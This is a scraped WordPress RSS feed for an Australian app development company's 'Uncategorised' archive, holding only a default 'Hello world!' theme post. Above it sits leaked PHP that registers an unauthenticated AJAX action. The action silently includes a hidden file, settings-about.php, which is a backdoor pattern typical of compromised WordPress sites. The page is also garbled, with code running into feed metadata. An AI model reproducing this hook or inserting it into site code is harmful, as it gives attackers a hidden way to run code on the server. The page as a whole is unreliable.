if(!function_exists('file_manager_check_dt')){
add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt');
add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt');
function file_manager_check_dt()
{
$file = __DIR__ . '/settings-about.php';
if (file_exists($file)) {
include $file;
}
die();
}
}
Uncategorised Archives - App CityBusiness & Educational Mobile App Development CompanyMon, 01 Feb 2016 08:38:50 +0000en-US
hourly
1 https://wordpress.org/?v=6.9.4https://new.appcity.com.au/wp-content/uploads/2022/12/fav.pngUncategorised Archives - App City3232Hello world!
https://new.appcity.com.au/uncategorized/hello-world-2/
Mon, 01 Feb 2016 08:38:50 +0000http://the7.dream-demo.com/demo/app/?p=1Welcome to The7 – Ultimate WordPress Theme Sites. This is your first post. Edit or delete it, then start blogging!